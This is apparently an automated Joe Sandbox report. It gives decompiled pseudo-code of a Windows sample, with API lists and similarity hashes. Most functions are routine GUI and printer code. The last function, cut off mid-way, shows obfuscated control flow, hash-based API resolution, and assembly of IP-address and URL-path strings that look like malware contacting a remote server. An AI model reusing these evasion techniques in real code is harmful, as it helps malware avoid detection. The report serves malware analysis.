                                            						 *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x80)) + _t131 * 4)) = _t134;
                                            					}
                                            					if(_a8 == 0) {
                                            						__eflags = _t131 - 1;
                                            						if(_t131 < 1) {
                                            							_t132 = _t109 + 0x7c;
                                            							E0041158A(_t109 + 0x7c,  *((intOrPtr*)(_t109 + 0x84)), _t134);
                                            							E0041158A(_t109 + 0x7c,  *((intOrPtr*)(_t132 + 8)), 0);
                                            						}
                                            						_t115 =  *0x439bf4; // 0x2
                                            						__eflags = 0;
                                            						_push(0x115);
                                            						_push(0);
                                            						_push(0);
                                            						_push( ~_t115);
                                            						_t117 =  *0x439bf0; // 0x2
                                            						_push( ~_t117);
                                            						_push(0);
                                            					} else {
                                            						CopyRect( &_v20, _a8);
                                            						E0041A2F1(_t109,  &_v20);
                                            						if(_t131 < 1) {
                                            							asm("cdq");
                                            							asm("cdq");
                                            							_push((_v20.bottom - _v20.top - _t130 >> 1) + _v20.top);
                                            							_push((_v20.right - _v20.left - _t130 >> 1) + _v20.left);
                                            							asm("movsd");
                                            							asm("movsd");
                                            							_push(_a4);
                                            							asm("movsd");
                                            							asm("movsd");
                                            							E0041DD44(_t109);
                                            							_t134 = _a4;
                                            						}
                                            						_push(0x114);
                                            						_push(_v20.bottom - _v20.top);
                                            						_push(_v20.right - _v20.left);
                                            						_push(_v20.top);
                                            						_push(_v20.left);
                                            						_push(0);
                                            					}
                                            					E0041663D(_t134);
                                            					if(E00413740(_t136, GetParent( *(_t134 + 0x1c))) != _t109) {
                                            						if(_t109 != 0) {
                                            							_t81 =  *(_t109 + 0x1c);
                                            						} else {
                                            							_t81 = 0;
                                            						}
                                            						E00413740(_t136, SetParent( *(_t134 + 0x1c), _t81));
                                            					}
                                            					_t120 =  *((intOrPtr*)(_t134 + 0x70));
                                            					_t153 =  *((intOrPtr*)(_t134 + 0x70));
                                            					if( *((intOrPtr*)(_t134 + 0x70)) != 0) {
                                            						E0041D609(_t120, _t153, _t134, 0xffffffff, 0);
                                            					}
                                            					 *((intOrPtr*)(_t134 + 0x70)) = _t109;
                                            					_t79 = E004225AA(_t109, _t153);
                                            					 *(_t79 + 0xb8) =  *(_t79 + 0xb8) | 0x0000000c;
                                            					return _t79;
                                            				}
                                            				if(_a8 != 0) {
                                            					_t61 = EqualRect( &_v36, _a8);
                                            					if(_t61 == 0) {
                                            						goto L3;
                                            					}
                                            				}
                                            				return _t61;
                                            			}

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Rect$Parent$CopyCtrlEqualWindow
                                            • String ID: @
                                            • API String ID: 3581194824-2766056989
                                            • Opcode ID: 2ea802bbfde414efe59f16374f298989db8c13d0e5b755017994176e5bba3002
                                            • Instruction ID: 8366d14a4fbab590a3c5e893c5bf745e495171ad1a8ef82a64abe53d0d133945
                                            • Opcode Fuzzy Hash: 2ea802bbfde414efe59f16374f298989db8c13d0e5b755017994176e5bba3002
                                            • Instruction Fuzzy Hash: 88518FB1A00615ABDF14DF69CC85AEE77AAEB44308F00452AE912D72A1DB38E985CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00409509() {
                                            				int _v4;
                                            				int _v8;
                                            				intOrPtr _t7;
                                            				CHAR* _t9;
                                            				WCHAR* _t17;
                                            				int _t20;
                                            				char* _t24;
                                            				int _t32;
                                            				CHAR* _t36;
                                            				WCHAR* _t38;
                                            				void* _t39;
                                            				int _t42;
                                            
                                            				_t7 =  *0x439ed4; // 0x1
                                            				_t32 = 0;
                                            				_t38 = 0;
                                            				_t36 = 0;
                                            				if(_t7 != 0) {
                                            					if(_t7 != 1) {
                                            						if(_t7 != 2) {
                                            							L27:
                                            							return 0;
                                            						}
                                            						L18:
                                            						if(_t36 != _t32) {
                                            							L20:
                                            							_t9 = _t36;
                                            							if( *_t36 == _t32) {
                                            								L23:
                                            								_t41 = _t9 - _t36 + 1;
                                            								_t39 = E00405667(_t9 - _t36 + 1);
                                            								if(_t39 != _t32) {
                                            									E00405700(_t39, _t36, _t41);
                                            								} else {
                                            									_t39 = 0;
                                            								}
                                            								FreeEnvironmentStringsA(_t36);
                                            								return _t39;
                                            							} else {
                                            								goto L21;
                                            							}
                                            							do {
                                            								do {
                                            									L21:
                                            									_t9 =  &(_t9[1]);
                                            								} while ( *_t9 != _t32);
                                            								_t9 =  &(_t9[1]);
                                            							} while ( *_t9 != _t32);
                                            							goto L23;
                                            						}
                                            						_t36 = GetEnvironmentStrings();
                                            						if(_t36 == _t32) {
                                            							goto L27;
                                            						}
                                            						goto L20;
                                            					}
                                            					L6:
                                            					if(_t38 != _t32) {
                                            						L8:
                                            						_t17 = _t38;
                                            						if( *_t38 == _t32) {
                                            							L11:
                                            							_t20 = (_t17 - _t38 >> 1) + 1;
                                            							_v4 = _t20;
                                            							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
                                            							if(_t42 != _t32) {
                                            								_t24 = E00405667(_t42);
                                            								_v8 = _t24;
                                            								if(_t24 != _t32) {
                                            									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
                                            										E004062E0(_v8);
                                            										_v8 = _t32;
                                            									}
                                            									_t32 = _v8;
                                            								}
                                            							}
                                            							FreeEnvironmentStringsW(_t38);
                                            							return _t32;
                                            						} else {
                                            							goto L9;
                                            						}
                                            						do {
                                            							do {
                                            								L9:
                                            								_t17 =  &(_t17[1]);
                                            							} while ( *_t17 != _t32);
                                            							_t17 =  &(_t17[1]);
                                            						} while ( *_t17 != _t32);
                                            						goto L11;
                                            					}
                                            					_t38 = GetEnvironmentStringsW();
                                            					if(_t38 == _t32) {
                                            						goto L27;
                                            					}
                                            					goto L8;
                                            				}
                                            				_t38 = GetEnvironmentStringsW();
                                            				if(_t38 == 0) {
                                            					_t36 = GetEnvironmentStrings();
                                            					if(_t36 == 0) {
                                            						goto L27;
                                            					}
                                            					 *0x439ed4 = 2;
                                            					goto L18;
                                            				}
                                            				 *0x439ed4 = 1;
                                            				goto L6;
                                            			}

                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409524
                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409538
                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409564
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040641E), ref: 0040959C
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040641E), ref: 004095BE
                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0040641E), ref: 004095D7
                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 004095EA
                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00409628
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                            • String ID:
                                            • API String ID: 1823725401-0
                                            • Opcode ID: c300a98435790b0a112db5af198a1087b81f0d641cfac9594a12296cbced713a
                                            • Instruction ID: ef1768683ce44c7a55569678311ee6e18f6548819425519884899f5cccb4810e
                                            • Opcode Fuzzy Hash: c300a98435790b0a112db5af198a1087b81f0d641cfac9594a12296cbced713a
                                            • Instruction Fuzzy Hash: 023142B35052147FD7313F765C9483BB79CE649358B59093BF482E32C2EA3A8C4286AD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E0041518D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct tagRECT* _a20, intOrPtr _a24, intOrPtr _a28) {
                                            				int _v8;
                                            				intOrPtr _v12;
                                            				int _v16;
                                            				int _v20;
                                            				struct tagRECT _v36;
                                            				void* _v40;
                                            				void* __ebp;
                                            				int _t56;
                                            				intOrPtr* _t57;
                                            				signed short _t62;
                                            				void* _t63;
                                            				void* _t67;
                                            				intOrPtr* _t80;
                                            				signed int _t83;
                                            				struct HWND__* _t86;
                                            				void* _t87;
                                            
                                            				_t67 = __ecx;
                                            				_v8 = 0;
                                            				_v12 = _a28;
                                            				_v16 = 0;
                                            				_v20 = 0;
                                            				if(_a24 == 0) {
                                            					GetClientRect( *(__ecx + 0x1c),  &_v36);
                                            				} else {
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            				}
                                            				if(_a16 == 1) {
                                            					_v40 = _v40 & 0x00000000;
                                            				} else {
                                            					_v40 = BeginDeferWindowPos(8);
                                            				}
                                            				_t56 = GetTopWindow( *(_t67 + 0x1c));
                                            				_t86 = _t56;
                                            				while(_t86 != 0) {
                                            					_t62 = GetDlgCtrlID(_t86);
                                            					_push(_t86);
                                            					_t83 = _t62 & 0x0000ffff;
                                            					_t63 = E00413767();
                                            					if(_t83 != _a12) {
                                            						if(_t83 >= _a4 && _t83 <= _a8 && _t63 != 0) {
                                            							SendMessageA(_t86, 0x361, 0,  &_v40);
                                            						}
                                            					} else {
                                            						_v8 = _t86;
                                            					}
                                            					_t56 = GetWindow(_t86, 2);
                                            					_t86 = _t56;
                                            				}
                                            				if(_a16 != 1) {
                                            					if(_a12 != 0 && _v8 != 0) {
                                            						_t57 = E00413740(_t87, _v8);
                                            						if(_a16 == 2) {
                                            							_t80 = _a20;
                                            							_v36.left = _v36.left +  *_t80;
                                            							_v36.top = _v36.top +  *((intOrPtr*)(_t80 + 4));
                                            							_v36.right = _v36.right -  *((intOrPtr*)(_t80 + 8));
                                            							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t80 + 0xc));
                                            						}
                                            						 *((intOrPtr*)( *_t57 + 0x60))( &_v36, 0);
                                            						_t56 = E004152C7( &_v40, _v8,  &_v36);
                                            					}
                                            					if(_v40 != 0) {
                                            						_t56 = EndDeferWindowPos(_v40);
                                            					}
                                            				} else {
                                            					if(_a28 == 0) {
                                            						_t56 = _a20;
                                            						 *((intOrPtr*)(_t56 + 8)) = _v20;
                                            						 *((intOrPtr*)(_t56 + 4)) = 0;
                                            						 *_t56 = 0;
                                            						 *((intOrPtr*)(_t56 + 0xc)) = _v16;
                                            					} else {
                                            						_t56 = CopyRect(_a20,  &_v36);
                                            					}
                                            				}
                                            				return _t56;
                                            			}

                                            APIs
                                            • GetClientRect.USER32 ref: 004151C0
                                            • BeginDeferWindowPos.USER32 ref: 004151CE
                                            • GetTopWindow.USER32(?), ref: 004151E0
                                            • GetDlgCtrlID.USER32 ref: 004151EF
                                            • SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 00415221
                                            • GetWindow.USER32(00000000,00000002), ref: 0041522A
                                            • CopyRect.USER32 ref: 00415246
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$Rect$BeginClientCopyCtrlDeferMessageSend
                                            • String ID:
                                            • API String ID: 3332788312-0
                                            • Opcode ID: e0fe07f5cd80bbe5b935e70b31fd5524e2a365d3d0350172d4ba8dcbf9d76f28
                                            • Instruction ID: 90a1176f2728ed92b7e018f664d1b63403b8a41a4a5cc89754fcf96d7c9d9e63
                                            • Opcode Fuzzy Hash: e0fe07f5cd80bbe5b935e70b31fd5524e2a365d3d0350172d4ba8dcbf9d76f28
                                            • Instruction Fuzzy Hash: D8418D72D00609EFCF15DF94D8848EEB7B5FF49304B1480AAE901A7251C738AE81CFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0041264E(void* __ecx, char* _a4) {
                                            				void* _v8;
                                            				void* _t15;
                                            				void* _t20;
                                            				void* _t35;
                                            
                                            				_push(__ecx);
                                            				_t35 = __ecx;
                                            				_t15 =  *(__ecx + 0x98);
                                            				if(_t15 != 0) {
                                            					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                                            					if(_t15 == 0) {
                                            						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                                            						if(_t15 != 0) {
                                            							_t18 =  *(_t35 + 0x94);
                                            							if( *(_t35 + 0x94) != 0) {
                                            								E0041A92B(_t18);
                                            							}
                                            							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                                            							 *(_t35 + 0x94) = _t20;
                                            							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                                            								E0041A92B( *(_t35 + 0x94));
                                            								 *(_t35 + 0x94) = 0;
                                            							}
                                            							_t15 = ClosePrinter(_v8);
                                            						}
                                            					}
                                            				}
                                            				return _t15;
                                            			}

                                            APIs
                                            • GlobalLock.KERNEL32 ref: 0041266E
                                            • lstrcmpA.KERNEL32(?,?), ref: 0041267A
                                            • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0041268C
                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004126AF
                                            • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004126B7
                                            • GlobalLock.KERNEL32 ref: 004126C4
                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 004126D1
                                            • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004126EF
                                              • Part of subcall function 0041A92B: GlobalFlags.KERNEL32(?), ref: 0041A935
                                              • Part of subcall function 0041A92B: GlobalUnlock.KERNEL32(?,?,?,0042421F,?,?,?,?,0040199F,00437BE8,?,004013A2), ref: 0041A94C
                                              • Part of subcall function 0041A92B: GlobalFree.KERNEL32 ref: 0041A957
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                            • String ID:
                                            • API String ID: 168474834-0
                                            • Opcode ID: 0d019d4b2acfde511ffeb0843ccef9a7e3a2d5da595c8f22555f1064e6ac44b4
                                            • Instruction ID: e892e9459afc7c616b27fd268aebf896f546ff29830f707e5cbc297c1b476139
                                            • Opcode Fuzzy Hash: 0d019d4b2acfde511ffeb0843ccef9a7e3a2d5da595c8f22555f1064e6ac44b4
                                            • Instruction Fuzzy Hash: 4011E771200104BEDB21AB76CD4AEAF7BBDEF85704F00042EF608D1152D7799DA1D728
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0042322D(intOrPtr __ecx) {
                                            				int _v8;
                                            				intOrPtr _v12;
                                            				struct tagRECT _v28;
                                            				intOrPtr _t24;
                                            				intOrPtr _t26;
                                            				int _t35;
                                            				long _t39;
                                            				intOrPtr _t40;
                                            				int _t42;
                                            				void* _t43;
                                            
                                            				_v12 = __ecx;
                                            				_v8 = GetSystemMetrics(6);
                                            				_t39 = GetSystemMetrics(5);
                                            				_t35 = GetSystemMetrics(0x21);
                                            				_t42 = GetSystemMetrics(0x20);
                                            				_v28.top = _v8;
                                            				_t24 =  *0x439c98; // 0x0
                                            				_v28.left = _t39;
                                            				_v28.right = _t24 - _t39;
                                            				_t26 =  *0x439c9c; // 0x0
                                            				_v28.bottom = _t26;
                                            				if((E00416528(_v12) & 0x00040600) != 0) {
                                            					OffsetRect( &_v28, _t42 - _t39, _t35 - _v8);
                                            				}
                                            				_t40 = _v12;
                                            				_push(GetWindowDC( *(_t40 + 0x1c)));
                                            				_t43 = E00419BA2();
                                            				InvertRect( *(_t43 + 4),  &_v28);
                                            				return ReleaseDC( *(_t40 + 0x1c),  *(_t43 + 4));
                                            			}

                                            APIs
                                            • GetSystemMetrics.USER32 ref: 00423241
                                            • GetSystemMetrics.USER32 ref: 00423248
                                            • GetSystemMetrics.USER32 ref: 0042324E
                                            • GetSystemMetrics.USER32 ref: 00423254
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • OffsetRect.USER32(?,00000000,?), ref: 0042328D
                                            • GetWindowDC.USER32(?,?,?,?), ref: 00423299
                                            • InvertRect.USER32(?,?), ref: 004232AE
                                            • ReleaseDC.USER32 ref: 004232BA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MetricsSystem$RectWindow$InvertLongOffsetRelease
                                            • String ID:
                                            • API String ID: 2500086165-0
                                            • Opcode ID: ba394ea1607188f933521b8238ab893581fe33d6a53f651306307ae79d27d4b5
                                            • Instruction ID: 7c5e0aa81d449cf31b82ccaaec63d8c78fb3c057318de3585a12a8b43351a0d8
                                            • Opcode Fuzzy Hash: ba394ea1607188f933521b8238ab893581fe33d6a53f651306307ae79d27d4b5
                                            • Instruction Fuzzy Hash: 4A112B72E00218ABCB10DFF9ED4999EBFB8EF44350F104166EA05E3250D775AD41CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E022312B0(char __ecx, signed int __edx, intOrPtr* _a4) {
                                            				char _v2048;
                                            				char _v2560;
                                            				char _v2688;
                                            				char _v2816;
                                            				intOrPtr* _v2820;
                                            				intOrPtr* _v2824;
                                            				char _v2828;
                                            				char _v2836;
                                            				char _v2844;
                                            				signed int _v2848;
                                            				intOrPtr _v2852;
                                            				void* _v2856;
                                            				intOrPtr* _v2860;
                                            				char _v2864;
                                            				intOrPtr _v2868;
                                            				char _v2872;
                                            				intOrPtr* _v2876;
                                            				signed int _v2880;
                                            				signed int _v2884;
                                            				signed int _v2888;
                                            				char _v2892;
                                            				intOrPtr* _v2896;
                                            				intOrPtr _v2904;
                                            				intOrPtr* _v2908;
                                            				void* __ebx;
                                            				void* __ebp;
                                            				void* _t117;
                                            				signed int _t118;
                                            				void* _t121;
                                            				intOrPtr* _t139;
                                            				intOrPtr* _t141;
                                            				signed int _t146;
                                            				signed int _t154;
                                            				intOrPtr* _t157;
                                            				intOrPtr* _t159;
                                            				signed int _t163;
                                            				intOrPtr* _t174;
                                            				signed int _t175;
                                            				signed int _t178;
                                            				intOrPtr* _t182;
                                            				void* _t189;
                                            				intOrPtr* _t191;
                                            				intOrPtr* _t194;
                                            				intOrPtr* _t196;
                                            				char _t241;
                                            				signed char* _t243;
                                            				signed int _t263;
                                            				short* _t265;
                                            				void* _t266;
                                            				short* _t267;
                                            				void* _t268;
                                            				void* _t269;
                                            				intOrPtr _t270;
                                            				signed int _t273;
                                            				intOrPtr* _t274;
                                            				void* _t276;
                                            				void* _t277;
                                            				intOrPtr* _t278;
                                            				void* _t280;
                                            				void* _t282;
                                            				void* _t283;
                                            				void* _t284;
                                            
                                            				_t280 =  &_v2896;
                                            				_t278 = _v2864;
                                            				_t263 = __edx;
                                            				_v2888 = 0;
                                            				_t241 = __ecx;
                                            				_v2884 = __edx;
                                            				_t196 = _v2860;
                                            				_t117 = 0xa52ba2c;
                                            				_v2892 = __ecx;
                                            				_v2896 = _t196;
                                            				_v2876 = _t278;
                                            				while(1) {
                                            					L1:
                                            					_t191 = _a4;
                                            					goto L2;
                                            					do {
                                            						while(1) {
                                            							L2:
                                            							_t282 = _t117 - 0x1a712fee;
                                            							if(_t282 > 0) {
                                            								break;
                                            							}
                                            							if(_t282 == 0) {
                                            								_t157 =  *0x223dea8;
                                            								__eflags = _t157;
                                            								if(_t157 == 0) {
                                            									_t157 = E02233E80(_t191, E02233F20(0xbb398380), 0x97f883e, _t278);
                                            									 *0x223dea8 = _t157;
                                            								}
                                            								_t268 =  *_t157();
                                            								_t159 =  *0x223e1a0;
                                            								__eflags = _t159;
                                            								if(_t159 == 0) {
                                            									_t159 = E02233E80(_t191, E02233F20(0xbb398380), 0x26c3f343, _t278);
                                            									 *0x223e1a0 = _t159;
                                            								}
                                            								 *_t159(_t268, 0, _v2844);
                                            								_t196 = _v2908;
                                            								_t117 = 0xa9569d6;
                                            								_t241 = _v2904;
                                            								continue;
                                            							} else {
                                            								_t283 = _t117 - 0xa52ba2c;
                                            								if(_t283 > 0) {
                                            									__eflags = _t117 - 0x1194a5ec;
                                            									if(__eflags > 0) {
                                            										__eflags = _t117 - 0x1947423a;
                                            										if(_t117 != 0x1947423a) {
                                            											goto L28;
                                            										} else {
                                            											_t163 = E02231FB0( &_v2872,  &_v2856);
                                            											_t196 = _v2896;
                                            											_t241 = _v2892;
                                            											asm("sbb eax, eax");
                                            											_t117 = ( ~_t163 & 0xd3a4a493) + 0x2ec7d52f;
                                            											continue;
                                            										}
                                            									} else {
                                            										if(__eflags == 0) {
                                            											_t265 =  &_v2560;
                                            											_t194 = _v2880 - (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + 1;
                                            											__eflags = _t194;
                                            											if(_t194 != 0) {
                                            												do {
                                            													_t273 = (_v2880 & 0x0000000f) + 4;
                                            													E02234ED0(_t265, _t273,  &_v2880);
                                            													_t267 = _t265 + _t273 * 2;
                                            													_t280 = _t280 + 4;
                                            													 *_t267 = 0x2f;
                                            													_t265 = _t267 + 2;
                                            													_t194 = _t194 - 1;
                                            													__eflags = _t194;
                                            												} while (_t194 != 0);
                                            												_t278 = _v2876;
                                            												_t196 = _v2896;
                                            											}
                                            											_t241 = _v2892;
                                            											 *_t265 = 0;
                                            											_t117 = 0x26613761;
                                            											_t263 = _v2884;
                                            											goto L1;
                                            										} else {
                                            											__eflags = _t117 - 0xa9569d6;
                                            											if(_t117 == 0xa9569d6) {
                                            												E02234250(_t191, _v2864);
                                            												_t196 = _v2896;
                                            												_t117 = 0xc5127ed;
                                            												_t241 = _v2892;
                                            												continue;
                                            											} else {
                                            												__eflags = _t117 - 0xc5127ed;
                                            												if(_t117 == 0xc5127ed) {
                                            													L69:
                                            													E02234250(_t191, _t278);
                                            													L70:
                                            													return _v2888;
                                            												} else {
                                            													goto L28;
                                            												}
                                            											}
                                            										}
                                            									}
                                            								} else {
                                            									if(_t283 == 0) {
                                            										_t174 =  *0x223dd4c;
                                            										__eflags = _t174;
                                            										if(_t174 == 0) {
                                            											_t174 = E02233E80(_t191, E02233F20(0xbb398380), 0xae3c1a47, _t278);
                                            											 *0x223dd4c = _t174;
                                            										}
                                            										_t175 =  *_t174();
                                            										_t196 = _v2896;
                                            										_t241 = _v2892;
                                            										_v2880 = _t175;
                                            										_t117 = 0x38f41d46;
                                            										continue;
                                            									} else {
                                            										_t284 = _t117 - 0x3354cb2;
                                            										if(_t284 > 0) {
                                            											__eflags = _t117 - 0x8f8b881;
                                            											if(_t117 != 0x8f8b881) {
                                            												goto L28;
                                            											} else {
                                            												_t178 = E02231950( &_v2844,  &_v2688,  &_v2836);
                                            												_t196 = _v2896;
                                            												_t280 = _t280 + 4;
                                            												_t241 = _v2892;
                                            												asm("sbb eax, eax");
                                            												_t117 = ( ~_t178 & 0x0c54f09a) + 0x1a712fee;
                                            												continue;
                                            											}
                                            										} else {
                                            											if(_t284 == 0) {
                                            												_t269 = E022334C0(0x223d0e0);
                                            												_t182 =  *0x223dc60;
                                            												__eflags = _t182;
                                            												if(_t182 == 0) {
                                            													_t182 = E02233E80(_t191, E02233F20(0xe66945e6), 0xcca28b0d, _t278);
                                            													 *0x223dc60 = _t182;
                                            												}
                                            												 *_t182( &_v2048, 0x400, _t269,  &_v2816,  &_v2688);
                                            												_t280 = _t280 + 0x14;
                                            												E02233460(_t269);
                                            												_t196 = _v2896;
                                            												_t117 = 0x8f8b881;
                                            												_t241 = _v2892;
                                            												continue;
                                            											} else {
                                            												if(_t117 == 0xe50069) {
                                            													E02234250(_t191, _v2856);
                                            													_t196 = _v2896;
                                            													_t117 = 0x2ec7d52f;
                                            													_t241 = _v2892;
                                            													continue;
                                            												} else {
                                            													if(_t117 != 0x26c79c2) {
                                            														goto L28;
                                            													} else {
                                            														 *((intOrPtr*)(_t191 + 4)) =  *_v2856;
                                            														_t270 = E022342F0(_t191,  *_v2856);
                                            														 *_t191 = _t270;
                                            														if(_t270 != 0) {
                                            															_push( *((intOrPtr*)(_t191 + 4)));
                                            															_push(_t270);
                                            															_t189 = E022357E0(_v2852 - 4);
                                            															_t280 = _t280 + 8;
                                            															asm("sbb edi, edi");
                                            															_v2888 =  ~_t263;
                                            															if(0 == _t189) {
                                            																E02234250(_t191,  *_t191);
                                            															}
                                            															_t263 = _v2884;
                                            														}
                                            														_t196 = _v2896;
                                            														_t117 = 0xe50069;
                                            														_t241 = _v2892;
                                            														continue;
                                            													}
                                            												}
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            							L71:
                                            						}
                                            						__eflags = _t117 - 0x2ec7d52f;
                                            						if(__eflags > 0) {
                                            							__eflags = _t117 - 0x310afd51;
                                            							if(_t117 == 0x310afd51) {
                                            								_v2828 = _t241;
                                            								_v2820 = _t196;
                                            								_v2824 = _t278;
                                            								_t118 = E02231E60( &_v2828,  &_v2864);
                                            								_t196 = _v2896;
                                            								_t241 = _v2892;
                                            								asm("sbb eax, eax");
                                            								_t117 = ( ~_t118 & 0x1deeb958) + 0xc5127ed;
                                            								goto L2;
                                            							} else {
                                            								__eflags = _t117 - 0x3380dca7;
                                            								if(_t117 == 0x3380dca7) {
                                            									_t121 = E022334C0(0x223d080);
                                            									_t274 =  *0x223dc60;
                                            									_t266 = _t121;
                                            									__eflags = _t274;
                                            									if(_t274 == 0) {
                                            										_t274 = E02233E80(_t191, E02233F20(0xe66945e6), 0xcca28b0d, _t278);
                                            										 *0x223dc60 = _t274;
                                            									}
                                            									_t243 =  *( *0x223e2e0 + 0xc);
                                            									 *_t274( &_v2816, 0x40, _t266, _t243[3] & 0x000000ff, _t243[2] & 0x000000ff, _t243[1] & 0x000000ff,  *_t243 & 0x000000ff);
                                            									_t280 = _t280 + 0x1c;
                                            									E02233460(_t266);
                                            									_t196 = _v2896;
                                            									_t263 = _v2884;
                                            									_t241 = _v2892;
                                            									_v2848 = ( *( *0x223e2e0 + 0xc))[4] & 0x0000ffff;
                                            									_t117 = 0x1194a5ec;
                                            									goto L2;
                                            								} else {
                                            									__eflags = _t117 - 0x38f41d46;
                                            									if(_t117 != 0x38f41d46) {
                                            										goto L28;
                                            									} else {
                                            										_t276 =  *(_t263 + 4) + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5) * 4 + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5);
                                            										_t278 = E022342F0(_t191, _t276);
